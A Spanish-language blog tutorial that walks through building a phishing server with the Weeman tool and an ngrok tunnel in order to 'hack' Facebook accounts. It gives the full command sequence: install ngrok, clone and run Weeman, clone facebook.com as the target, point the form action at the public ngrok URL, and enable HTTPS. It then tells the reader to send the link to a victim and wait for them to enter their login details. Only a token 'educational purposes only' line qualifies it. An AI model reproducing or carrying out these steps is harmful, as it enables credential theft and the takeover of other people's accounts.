Weeman y Ngrok son las mejores herramienta para realizar ataques de phishing actualmente. Crea tu propio servidor de phishing para hackear cuentas de Facebook u otra red social.
Con Weeman podemos tener un servidor HTTP para phishing en Python, además tiene soporte para la mayoría de los sitios web (los más grandes). Por su lado, ngrok garantiza la creación de túneles seguros a un servidor local.
Anteriormente, publiqué una entrada sobre cómo hackear Facebook con Phishing. Dicho método es muy sencillo y a la vez difícil de dar resultados por ser muy predecible. Ahora veremos otra situación, que con algunos ajustes, las probabilidades de tener éxito aumentan considerablemente.
1. Weeman y Ngrok
Una vez extraído, copiamos el archivo a la carpeta de binarios /usr/bin para ejecutarlo posteriormente.
sudo cp /ruta/ngrok /usr/bin
- Descargamos Weeman desde github
git clone https://github.com/samyoyo/weeman.git
- Para iniciar Weeman, abra la terminal y ejecute los siguientes comandos:
cd weeman
chmod +x weeman.py
python weeman.py
show
2. Hackear Facebook con Phishing
- Inicie Weeman con el comando show:
- Una vez ejecutado weeman, abra una nueva terminal y ejecute ngrok
ngrok http 8080
- Ahora en la terminal con Weeman abierto, ejecute los siguientes comandos:
set url https://facebook.com
set action_url xxx_ngrok.io
set port 8080
run
Por supuesto, xxx_ngrok.io es la URL generada al ejecutar Ngrok anteriormente, ese enlace le servirá como sitio web de Phishing.
- La URL generada por Ngrok se encuentra en HTTP, para utilizar HTTPS escriba el siguiente comando al ejecutar Ngrok:
ngrok http -bind-tls=true 8080
Por último, envíe la URL a la víctima y espere a que abra ese enlace e inicie sesión con sus credenciales.
3. Tutorial: Crear un servidor Phishing
Consulte el tutorial paso a paso para una mejor comprensión de cómo crear un servidor phishing para, por ejemplo, capturar el usuario y contraseña de una cuenta de Facebook.
¡SOLO UTILICE CON FINES EDUCATIVOS! ¡Si te ha gustado el artículo, no dudes en compartirlo con los demás 😉 !